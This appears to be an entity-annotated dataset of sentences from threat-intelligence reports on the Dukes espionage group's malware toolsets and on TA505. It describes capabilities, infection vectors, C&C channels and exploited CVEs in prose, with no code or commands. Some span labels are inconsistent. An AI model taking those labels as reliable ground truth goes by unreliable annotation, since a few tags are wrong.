{"text": "This information stealer is augmented by a variety of components that the toolset operators may selectively include with the main component to provide additional functionalities , such as multiple methods of establishing persistence , as well as modules that attempt to exploit privilege escalation vulnerabilities in order to execute CosmicDuke with higher privileges .", "spans": [{"start": 5, "end": 24, "label": "System"}, {"start": 335, "end": 345, "label": "Malware"}]}
{"text": "CosmicDuke \u2019s information stealing functionality includes : Keylogging , Taking screenshots , Stealing clipboard contents , Stealing user files with file extensions that match a predefined list , Exporting the users cryptographic certificates including private keys , Collecting user credentials , including passwords , for a variety of popular chat and email programs as well as from web browsers CosmicDuke may use HTTP , HTTPS , FTP or WebDav to exfiltrate the collected data to a hardcoded C&C server .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 354, "end": 359, "label": "System"}, {"start": 398, "end": 408, "label": "Malware"}, {"start": 417, "end": 421, "label": "Indicator"}, {"start": 424, "end": 429, "label": "Indicator"}, {"start": 432, "end": 435, "label": "Indicator"}, {"start": 439, "end": 445, "label": "Indicator"}, {"start": 494, "end": 497, "label": "System"}]}
{"text": "While we believe CosmicDuke to be an entirely custom- written toolset with no direct sharing of code with other Duke toolsets , the high-level ways in which many of its features have been implemented appear to be shared with other members of the Duke arsenal .", "spans": [{"start": 17, "end": 27, "label": "Malware"}, {"start": 112, "end": 116, "label": "Organization"}, {"start": 246, "end": 250, "label": "Organization"}]}
{"text": "Specifically , the techniques CosmicDuke uses to extract user credentials from targeted software and to detect the presence of analysis tools appear to be based on the techniques used by PinchDuke .", "spans": [{"start": 30, "end": 40, "label": "Malware"}, {"start": 187, "end": 196, "label": "Malware"}]}
{"text": "Likewise , many of CosmicDuke \u2019s persistence components use techniques also used by components associated with GeminiDuke and CozyDuke .", "spans": [{"start": 19, "end": 29, "label": "Malware"}, {"start": 111, "end": 121, "label": "Malware"}, {"start": 126, "end": 134, "label": "Malware"}]}
{"text": "In all of these cases , the techniques are the same , but the code itself has been altered to work with the toolset in question , leading to small differences in the final implementation .", "spans": []}
{"text": "A few of the CosmicDuke samples we discovered also included components that attempt to exploit either of the publicly known CVE-2010-0232 or CVE-2010- 4398 privilege escalation vulnerabilities .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 141, "end": 155, "label": "Vulnerability"}]}
{"text": "In the case of CVE-2010-0232 , the exploit appears to be based directly on the proof of concept code published by security researcher Tavis Ormandy when he disclosed the vulnerability .", "spans": [{"start": 15, "end": 28, "label": "Vulnerability"}]}
{"text": "We believe that the exploit for CVE- 2010-4398 was also based on a publicly available proof of concept .", "spans": [{"start": 32, "end": 46, "label": "Vulnerability"}]}
{"text": "In addition to often embedding persistence or privilege escalation components , CosmicDuke has occasionally embedded PinchDuke , GeminiDuke , or MiniDuke components .", "spans": [{"start": 80, "end": 90, "label": "Malware"}, {"start": 117, "end": 126, "label": "Malware"}, {"start": 129, "end": 139, "label": "Malware"}, {"start": 145, "end": 153, "label": "Malware"}]}
{"text": "It should be noted that CosmicDuke does not interoperate with the second , embedded malware in any way other than by writing the malware to disk and executing it .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]}
{"text": "After that , CosmicDuke and the second malware operate entirely independently of each other , including separately contacting their C&C servers .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 132, "end": 135, "label": "System"}]}
{"text": "Sometimes , both malware have used the same C&C server , but in other cases , even the servers have been different .", "spans": [{"start": 44, "end": 47, "label": "System"}]}
{"text": "Finally , it is worth noting that while most of the compilation timestamps for CosmicDuke samples appear to be authentic , we are aware of a few cases of them being forged .", "spans": [{"start": 79, "end": 89, "label": "Malware"}]}
{"text": "One such case was detailed on page 10 as an apparent evasion attempt .", "spans": []}
{"text": "Another is a loader variant seen during the spring of 2010 in conjunction with both CosmicDuke and PinchDuke .", "spans": [{"start": 13, "end": 19, "label": "System"}, {"start": 84, "end": 94, "label": "Malware"}, {"start": 99, "end": 108, "label": "Malware"}]}
{"text": "These loader samples all had compilation timestamps purporting to be from the 24th or the 25th of September , 2001 .", "spans": [{"start": 6, "end": 12, "label": "System"}]}
{"text": "However , many of these loader samples embed CosmicDuke variants that exploit the CVE-2010- 0232 privilege escalation vulnerability thus making it impossible for the compilation timestamps to be authentic .", "spans": [{"start": 45, "end": 55, "label": "Malware"}, {"start": 82, "end": 96, "label": "Vulnerability"}]}
{"text": "MINIDUKE : First known activity Loader July 2010 , Backdoor May 2011 Most recent known activity Loader : Spring 2015 , Backdoor : Summer 2014 C&C communication methods HTTP(S) , Twitter , Known toolset components Downloader , Backdoor , Loader .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 142, "end": 145, "label": "System"}, {"start": 168, "end": 175, "label": "Indicator"}, {"start": 178, "end": 185, "label": "System"}, {"start": 213, "end": 223, "label": "System"}, {"start": 226, "end": 234, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]}
{"text": "The MiniDuke toolset consists of multiple downloader and backdoor components , which are commonly referred to as the MiniDuke \u201c stage 1 \u201d , \u201c stage 2 \u201d , and \u201c stage 3 \u201d components as per Kaspersky \u2019s original MiniDuke whitepaper .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 117, "end": 125, "label": "Malware"}, {"start": 210, "end": 218, "label": "Malware"}]}
{"text": "Additionally , a specific loader is often associated with the MiniDuke toolset and is referred to as the \u201c MiniDuke loader \u201d .", "spans": [{"start": 26, "end": 32, "label": "System"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 107, "end": 115, "label": "Malware"}, {"start": 116, "end": 122, "label": "System"}]}
{"text": "While the loader has often been used together with other MiniDuke components , it has also commonly been used in conjunction with CosmicDuke and PinchDuke .", "spans": [{"start": 10, "end": 16, "label": "System"}, {"start": 57, "end": 65, "label": "Malware"}, {"start": 130, "end": 140, "label": "Malware"}, {"start": 145, "end": 154, "label": "Malware"}]}
{"text": "In fact , the oldest samples of the loader that we have found were used with PinchDuke .", "spans": [{"start": 36, "end": 42, "label": "System"}, {"start": 77, "end": 86, "label": "Malware"}]}
{"text": "To avoid confusion however , we have decided to continue referring to the loader as the \u201c MiniDuke loader \u201d .", "spans": [{"start": 74, "end": 80, "label": "System"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 99, "end": 105, "label": "System"}]}
{"text": "Two details about MiniDuke components are worth noting .", "spans": [{"start": 18, "end": 26, "label": "Malware"}]}
{"text": "Firstly , some of the MiniDuke components were written in Assembly language .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 58, "end": 66, "label": "System"}]}
{"text": "While many malware were written in Assembly during the \u2018 old days \u2018 of curiosity-driven virus writing , it has since become a rarity .", "spans": [{"start": 35, "end": 43, "label": "System"}]}
{"text": "Secondly , some of the MiniDuke components do not contain a hardcoded C&C server address , but instead obtain the address of a current C&C server via Twitter .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 70, "end": 73, "label": "System"}, {"start": 135, "end": 138, "label": "System"}, {"start": 150, "end": 157, "label": "System"}]}
{"text": "The use of Twitter either to initially obtain the address of a C&C server ( or as a backup if no hardcoded primary C&C server responds ) is a feature also found in OnionDuke , CozyDuke , and HammerDuke .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 63, "end": 66, "label": "System"}, {"start": 115, "end": 118, "label": "System"}, {"start": 164, "end": 173, "label": "Malware"}, {"start": 176, "end": 184, "label": "Malware"}, {"start": 191, "end": 201, "label": "Malware"}]}
{"text": "COZYDUKE : First known activity January 2010 , Most recent known activity : Spring 2015 , Other names CozyBear , CozyCar , Cozer , EuroAPT , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Modular backdoor , Multiple persistence components , Information gathering module , Screenshot module , Password stealing module , Password hash stealing module .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 102, "end": 110, "label": "Malware"}, {"start": 113, "end": 120, "label": "Malware"}, {"start": 123, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 144, "label": "System"}, {"start": 167, "end": 174, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 223, "end": 230, "label": "System"}, {"start": 233, "end": 240, "label": "System"}]}
{"text": "CozyDuke is not simply a malware toolset ; rather , it is a modular malware platform formed around a core backdoor component .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 106, "end": 114, "label": "System"}]}
{"text": "This component can be instructed by the C&C server to download and execute arbitrary modules , and it is these modules that provide CozyDuke with its vast array of functionality .", "spans": [{"start": 40, "end": 43, "label": "System"}, {"start": 132, "end": 140, "label": "Malware"}]}
{"text": "Known CozyDuke modules include : Command execution module for executing arbitrary Windows Command Prompt commands , Password stealer module , NT LAN Manager ( NTLM ) hash stealer module , System information gathering module , Screenshot module .", "spans": [{"start": 6, "end": 14, "label": "Malware"}, {"start": 82, "end": 89, "label": "System"}, {"start": 90, "end": 104, "label": "System"}, {"start": 116, "end": 132, "label": "System"}, {"start": 142, "end": 156, "label": "System"}, {"start": 159, "end": 163, "label": "System"}, {"start": 166, "end": 178, "label": "System"}]}
{"text": "In addition to modules , CozyDuke can also be instructed to download and execute other , independent executables .", "spans": [{"start": 25, "end": 33, "label": "Malware"}]}
{"text": "In some observed cases , these executables were self-extracting archive files containing common hacking tools , such as PSExec and Mimikatz , combined with script files that execute these tools .", "spans": [{"start": 120, "end": 126, "label": "System"}, {"start": 131, "end": 139, "label": "System"}]}
{"text": "In other cases , CozyDuke has been observed downloading and executing tools from other toolsets used by the Dukes such as OnionDuke , SeaDuke , and HammerDuke .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 148, "end": 158, "label": "Malware"}]}
{"text": "ONIONDUKE : First known activity February 2013 , Most recent known activity Spring 2015 , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Loader , Multiple modular core components , Information stealer , Distributed Denial of Service ( DDoS ) module , Password stealing module , Information gathering module , Social network spamming module .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 90, "end": 93, "label": "System"}, {"start": 116, "end": 123, "label": "Indicator"}, {"start": 126, "end": 133, "label": "System"}, {"start": 172, "end": 179, "label": "System"}, {"start": 182, "end": 188, "label": "System"}, {"start": 191, "end": 207, "label": "System"}, {"start": 226, "end": 245, "label": "System"}, {"start": 248, "end": 277, "label": "System"}, {"start": 280, "end": 284, "label": "System"}]}
{"text": "The OnionDuke toolset includes at least a dropper , a loader , an information stealer Trojan and multiple modular variants with associated modules .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 42, "end": 49, "label": "System"}, {"start": 54, "end": 60, "label": "System"}, {"start": 66, "end": 85, "label": "System"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 97, "end": 113, "label": "System"}]}
{"text": "OnionDuke first caught our attention because it was being spread via a malicious Tor exit node .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 81, "end": 84, "label": "System"}]}
{"text": "The Tor node would intercept any unencrypted executable files being downloaded and modify those executables by adding a malicious wrapper contained an embedded OnionDuke .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 160, "end": 169, "label": "Malware"}]}
{"text": "Once the victim finished downloading the file and executed it , the wrapper would infect the victim \u2019s computer with OnionDuke before executing the original legitimate executable .", "spans": [{"start": 117, "end": 126, "label": "Malware"}]}
{"text": "The same wrapper has also been used to wrap legitimate executable files , which were then made available for users to download from torrent sites .", "spans": []}
{"text": "Again , if a victim downloaded a torrent containing a wrapped executable , they would get infected with OnionDuke .", "spans": [{"start": 104, "end": 113, "label": "Malware"}]}
{"text": "Finally , we have also observed victims being infected with OnionDuke after they were already infected with CozyDuke .", "spans": [{"start": 60, "end": 69, "label": "Malware"}, {"start": 108, "end": 116, "label": "Malware"}]}
{"text": "In these cases , CozyDuke was instructed by its C&C server to download and execute OnionDuke toolset .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 48, "end": 51, "label": "System"}, {"start": 83, "end": 92, "label": "Malware"}]}
{"text": "SEADUKE : First known activity October 2014 , Most recent known activity Spring 2015 , Other names SeaDaddy , SeaDask , C&C communication methods HTTP(S) , Known toolset components Backdoor .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 99, "end": 107, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 123, "label": "Malware"}, {"start": 146, "end": 153, "label": "Indicator"}]}
{"text": "SeaDuke is a simple backdoor that focuses on executing commands retrieved from its C&C server , such as uploading and downloading files , executing system commands and evaluating additional Python code .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 83, "end": 86, "label": "System"}, {"start": 190, "end": 196, "label": "System"}]}
{"text": "SeaDuke is made interesting by the fact that it is written in Python and designed to be cross-platform so that it works on both Windows and Linux .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 62, "end": 68, "label": "System"}, {"start": 128, "end": 135, "label": "System"}, {"start": 140, "end": 145, "label": "System"}]}
{"text": "The only known infection vector for SeaDuke is via an existing CozyDuke infection , wherein CozyDuke downloads and executes the SeaDuke toolset .", "spans": [{"start": 36, "end": 43, "label": "Malware"}, {"start": 63, "end": 71, "label": "Malware"}, {"start": 92, "end": 100, "label": "Malware"}, {"start": 128, "end": 135, "label": "Malware"}]}
{"text": "Like HammerDuke , SeaDuke appears to be used by the Dukes group primarily as a secondary backdoor left on CozyDuke victims after that toolset has completed the initial infection and stolen any readily available information from them .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 18, "end": 25, "label": "Malware"}, {"start": 52, "end": 57, "label": "Organization"}, {"start": 106, "end": 114, "label": "Malware"}]}
{"text": "HAMMERDUKE : First known activity January 2015 , Most recent known activity Summer 2015 , Other names HAMMERTOSS , Netduke , C&C communication methods HTTP(S) , Twitter , Known toolset components Backdoor .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 102, "end": 112, "label": "Malware"}, {"start": 115, "end": 122, "label": "Malware"}, {"start": 125, "end": 128, "label": "System"}, {"start": 151, "end": 158, "label": "Indicator"}, {"start": 161, "end": 168, "label": "System"}]}
{"text": "HammerDuke is a simple backdoor that is apparently designed for similar use cases as SeaDuke .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 85, "end": 92, "label": "Malware"}]}
{"text": "Specifically , the only known infection vector for HammerDuke is to be downloaded and executed by CozyDuke onto a victim that has already been compromised by that toolset .", "spans": [{"start": 51, "end": 61, "label": "Malware"}, {"start": 98, "end": 106, "label": "Malware"}]}
{"text": "This , together with HammerDuke \u2019s simplistic backdoor functionality , suggests that it is primarily used by the Dukes group as a secondary backdoor left on CozyDuke victims after CozyDuke performed the initial infection and stole any readily available information from them .", "spans": [{"start": 21, "end": 31, "label": "Malware"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 157, "end": 165, "label": "Malware"}, {"start": 180, "end": 188, "label": "Malware"}]}
{"text": "HammerDuke is however interesting because it is written in .NET , and even more so because of its occasional use of Twitter as a C&C communication channel .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 59, "end": 63, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 129, "end": 132, "label": "Organization"}]}
{"text": "Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands , but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 50, "end": 53, "label": "System"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 188, "end": 195, "label": "System"}]}
{"text": "If the account exists , HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]}
{"text": "HammerDuke \u2019s use of Twitter and crafted image files is reminiscent of other Duke toolsets .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 21, "end": 28, "label": "System"}, {"start": 77, "end": 81, "label": "Organization"}]}
{"text": "Both OnionDuke and MiniDuke also use date-based algorithms to generate Twitter account names and then searched for any tweets from those accounts that linked to image files .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 19, "end": 27, "label": "Malware"}, {"start": 71, "end": 78, "label": "System"}]}
{"text": "In contrast however , for OnionDuke and MiniDuke the linked image files contain embedded malware to be downloaded and executed , rather than instructions .", "spans": [{"start": 26, "end": 35, "label": "Malware"}, {"start": 40, "end": 48, "label": "Malware"}]}
{"text": "Similarly , GeminiDuke may also download image files , but these would contain embedded additional configuration information for the toolset itself .", "spans": [{"start": 12, "end": 22, "label": "Malware"}]}
{"text": "Unlike HammerDuke however , the URLs for the images downloaded by GeminiDuke are hardcoded in its initial configuration , rather than retrieved from Twitter .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}, {"start": 149, "end": 156, "label": "System"}]}
{"text": "CLOUDDUKE : First known activity June 2015 , Most recent known activity Summer 2015 , Other names MiniDionis , CloudLook , C&C communication methods HTTP(S) , Microsoft OneDrive , Known toolset components Downloader , Loader , Two backdoor variants .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 123, "end": 126, "label": "System"}, {"start": 149, "end": 156, "label": "Indicator"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 169, "end": 177, "label": "System"}, {"start": 205, "end": 215, "label": "System"}, {"start": 218, "end": 224, "label": "System"}]}
{"text": "CloudDuke is a malware toolset known to consist of , at least , a downloader , a loader and two backdoor variants .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 66, "end": 76, "label": "System"}, {"start": 81, "end": 87, "label": "System"}]}
{"text": "The CloudDuke downloader will download and execute additional malware from a preconfigured location .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 24, "label": "System"}]}
{"text": "Interestingly , that location may be either a web address or a Microsoft OneDrive account .", "spans": [{"start": 63, "end": 72, "label": "Organization"}, {"start": 73, "end": 81, "label": "System"}]}
{"text": "Both CloudDuke backdoor variants support simple backdoor functionality , similar to SeaDuke .", "spans": [{"start": 5, "end": 23, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}]}
{"text": "While one variant will use a preconfigured C&C server over HTTP or HTTPS , the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators .", "spans": [{"start": 43, "end": 46, "label": "System"}, {"start": 59, "end": 63, "label": "Indicator"}, {"start": 67, "end": 72, "label": "Indicator"}, {"start": 104, "end": 113, "label": "Organization"}, {"start": 114, "end": 122, "label": "System"}]}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBER ESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "The Dukes primarily use spear-phishing emails when attempting to infect victims with their malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 39, "end": 45, "label": "System"}]}
{"text": "These spear-phishing emails range from ones purposely designed to look like spam messages used to spread common crimeware and addressed to large numbers of people , to highly targeted emails addressed to only a few recipients ( or even just one person ) and with content that is highly relevant for the intended recipient .", "spans": [{"start": 21, "end": 27, "label": "System"}, {"start": 184, "end": 190, "label": "System"}]}
{"text": "In some cases , the Dukes appear to have used previously compromised victims to send new spear-phishing emails to other targets .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 104, "end": 110, "label": "System"}]}
{"text": "The spear-phishing emails used by the Dukes may contain either specially-crafted malicious attachments or links to URLs hosting the malware .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 38, "end": 43, "label": "Organization"}]}
{"text": "When malicious attachments are used , they may either be designed to exploit a vulnerability in a popular software assumed to be installed on the victim \u2019s machine , such as Microsoft Word or Adobe Reader , or the attachment itself may have its icon and filename obfuscated in such a way that the file does not appear to be an executable .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 184, "end": 188, "label": "System"}, {"start": 192, "end": 204, "label": "System"}]}
{"text": "The only instances which we are aware of where the Dukes did not use spear-phishing as the initial infection vector is with certain OnionDuke variants .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 132, "end": 141, "label": "Malware"}]}
{"text": "These were instead spread using either a malicious Tor node that would trojanize legitimate applications on-the-fly with the OnionDuke toolset , or via torrent files containing previously trojanized versions of legitimate applications .", "spans": [{"start": 51, "end": 54, "label": "System"}, {"start": 125, "end": 134, "label": "Malware"}]}
{"text": "Finally , it is worth noting that the Dukes are known to sometimes re-infect a victim of one of their malware tools with another one of their tools .", "spans": [{"start": 38, "end": 43, "label": "Organization"}]}
{"text": "Examples include CozyDuke infecting its victims with SeaDuke , HammerDuke ,or OnionDuke ; and CosmicDuke infecting its victims with PinchDuke ,GeminiDuke or MiniDuke .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 63, "end": 73, "label": "Malware"}, {"start": 78, "end": 87, "label": "Malware"}, {"start": 94, "end": 104, "label": "Malware"}, {"start": 132, "end": 141, "label": "Malware"}, {"start": 142, "end": 153, "label": "Malware"}, {"start": 157, "end": 165, "label": "Malware"}]}
{"text": "The Dukes have employed exploits both in their infection vectors as well as in their malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 88, "end": 96, "label": "Malware"}, {"start": 150, "end": 158, "label": "Vulnerability"}]}
{"text": "In all known cases where exploits were employed , we believe the Dukes did not themselves discover the vulnerabilities or design the original exploits ; for the exploited zero-day , we believe the Dukes purchased the exploit .", "spans": [{"start": 65, "end": 70, "label": "Organization"}, {"start": 171, "end": 179, "label": "Vulnerability"}, {"start": 197, "end": 202, "label": "Organization"}]}
{"text": "In all other cases , we believe the group simply repurposed publicly available exploits or proofs of concept .", "spans": []}
{"text": "Attribution is always a difficult question , but attempting to answer it is important in understanding these types of threats and how to defend against them .", "spans": []}
{"text": "This paper has already stated that we believe the Dukes to be a Russian state-sponsored cyberespionage operation .", "spans": [{"start": 50, "end": 55, "label": "Organization"}]}
{"text": "To reach this conclusion , we began by analyzing the apparent objectives and motivations of the group .", "spans": []}
{"text": "Based on what we currently know about the targets chosen by the Dukes over the past 7 years , they appear to have consistently targeted entities that deal with foreign policy and security policy matters .", "spans": [{"start": 64, "end": 69, "label": "Organization"}]}
{"text": "These targets have included organizations such as ministries of foreign affairs , embassies , senates , parliaments , ministries of defense , defense contractors , and think tanks .", "spans": []}
{"text": "In one of their more intriguing cases , the Dukes have appeared to also target entities involved in the trafficking of illegal drugs .", "spans": [{"start": 44, "end": 49, "label": "Organization"}]}
{"text": "Even such targets however appear to be consistent with the overarching theme , given the drug trade \u2019s relevance to security policy .", "spans": []}
{"text": "Based on this , we are confident in our conclusion that the Dukes \u2019 primary mission is the collection of intelligence to support foreign and security policy decision-making .", "spans": [{"start": 60, "end": 65, "label": "Organization"}]}
{"text": "Based on the length of the Dukes \u2019 activity , our estimate of the amount of resources invested in the operation and the fact that their activity only appears to be increasing , we believe the group to have significant and most critically , stable financial backing .", "spans": [{"start": 27, "end": 32, "label": "Organization"}]}
{"text": "The Dukes have consistently operated large-scale campaigns against high-profile targets while concurrently engaging in smaller , more targeted campaigns with apparent coordination and no evidence of unintentional overlap or operational clashes .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "We therefore believe the Dukes to be a single , large , wellcoordinated organization with clear separation of responsibilities and targets .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]}
{"text": "The Dukes appear to prioritize the continuation of their operations over stealth .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "Their 2015 CozyDuke and CloudDuke campaigns take this to the extreme by apparently opting for speed and quantity over stealth and quality .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 24, "end": 33, "label": "Malware"}]}
{"text": "In the most extreme case , the Dukes continued with their July 2015 CloudDuke campaign even after their activity had been outed by multiple security vendors .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 68, "end": 77, "label": "Malware"}]}
{"text": "We therefore believe the Dukes \u2019 primary mission to be so valuable to their benefactors that its continuation outweighs everything else .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]}
{"text": "This apparent disregard for publicity suggests , in our opinion , that the benefactors of the Dukes is so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 162, "end": 167, "label": "Organization"}]}
{"text": "We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates .", "spans": []}
{"text": "We therefore believe the Dukes to work either within or directly for a government , thus ruling out the possibility of a criminal gang or another third party .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]}
{"text": "Kaspersky Labs has previously noted the presence of Russian-language artefacts in some of the Duke malware samples .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 94, "end": 98, "label": "Organization"}]}
{"text": "We have also found a Russian-language error message in many PinchDuke samples which translates as , \u201c There is an error in the module \u2019s name ! The length of the data section name must be 4 bytes! \u201d Additionally , Kaspersky noted that based on the compilation timestamps , the authors of the Duke malware appear to primarily work from Monday to Friday between the times of 6am and 4pm UTC+0 .", "spans": [{"start": 60, "end": 69, "label": "Malware"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 292, "end": 296, "label": "Organization"}]}
{"text": "This corresponds to working hours between 9am and 7pm in the UTC+3 time zone , also known as Moscow Standard Time , which covers , among others , much of western Russia , including Moscow and St. Petersburg .", "spans": [{"start": 100, "end": 113, "label": "System"}]}
{"text": "The Kaspersky Labs analysis of the Duke malware authors \u2019 working times is supported by our own analysis , as well as that performed by FireEye .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 136, "end": 143, "label": "Organization"}]}
{"text": "This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": [{"start": 74, "end": 84, "label": "Malware"}, {"start": 148, "end": 161, "label": "System"}, {"start": 237, "end": 247, "label": "Malware"}]}
{"text": "Finally , the known targets of the Dukes - Eastern European foreign ministries , western think tanks and governmental organizations , even Russian-speaking drug dealers - conform to publiclyknown Russian foreign policy and security policy interests .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]}
{"text": "Even though the Dukes appear to have targeted governments all over the world , we are unaware of them ever targeting the Russian government .", "spans": [{"start": 16, "end": 21, "label": "Organization"}]}
{"text": "While absence of evidence is not evidence of absence , it is an interesting detail to note .", "spans": []}
{"text": "Threat Actor Profile : TA505 , From Dridex to GlobeImposter .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 46, "end": 59, "label": "Malware"}]}
{"text": "Proofpoint researchers track a wide range of threat actors involved in both financially motivated cybercrime and state-sponsored actions .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]}
{"text": "One of the more prolific actors that we track - referred to as TA505 - is responsible for the largest malicious spam campaigns we have ever observed , distributing instances of the Dridex banking Trojan , Locky ransomware , Jaff ransomware , The Trick banking Trojan , and several others in very high volumes .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 181, "end": 187, "label": "Malware"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 205, "end": 210, "label": "Malware"}, {"start": 224, "end": 228, "label": "Malware"}, {"start": 246, "end": 251, "label": "Malware"}, {"start": 260, "end": 266, "label": "Malware"}]}
{"text": "Because TA505 is such a significant part of the email threat landscape , this blog provides a retrospective on the shifting malware , payloads , and campaigns associated with this actor .", "spans": [{"start": 8, "end": 13, "label": "Organization"}, {"start": 48, "end": 53, "label": "System"}]}
{"text": "We examine their use malware such as Jaff , Bart , and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony .", "spans": [{"start": 37, "end": 41, "label": "Malware"}, {"start": 44, "end": 48, "label": "Malware"}, {"start": 55, "end": 65, "label": "Malware"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 167, "end": 171, "label": "Malware"}]}
{"text": "Where possible , we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns .", "spans": [{"start": 110, "end": 115, "label": "Organization"}]}
{"text": "The infographic in Figure 1 traces the earliest known dates on which TA505 began distributing particular malware strains , beginning with Dridex in 2014 and most recently when they elevated GlobeImposter and Philadelphia from small , regionally targeted ransomware variants to global threats .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 138, "end": 144, "label": "Malware"}, {"start": 190, "end": 203, "label": "Malware"}, {"start": 208, "end": 220, "label": "Malware"}]}
{"text": "Of note is TA505 \u2019s use of the Necurs botnet to drive their massive spam campaigns .", "spans": [{"start": 11, "end": 16, "label": "Organization"}, {"start": 31, "end": 37, "label": "Malware"}]}
{"text": "As we saw in both 2016 and 2017 , disruptions to Necurs went hand-in-hand with quiet periods from TA505 .", "spans": [{"start": 49, "end": 55, "label": "Malware"}, {"start": 98, "end": 103, "label": "Organization"}]}
{"text": "When the botnet came back online , TA505 campaigns quickly returned , usually at even greater scale than before the disruption .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]}
{"text": "The following is a more detailed description of the malware and notable campaign attributes associated with TA505 .", "spans": [{"start": 108, "end": 113, "label": "Organization"}]}
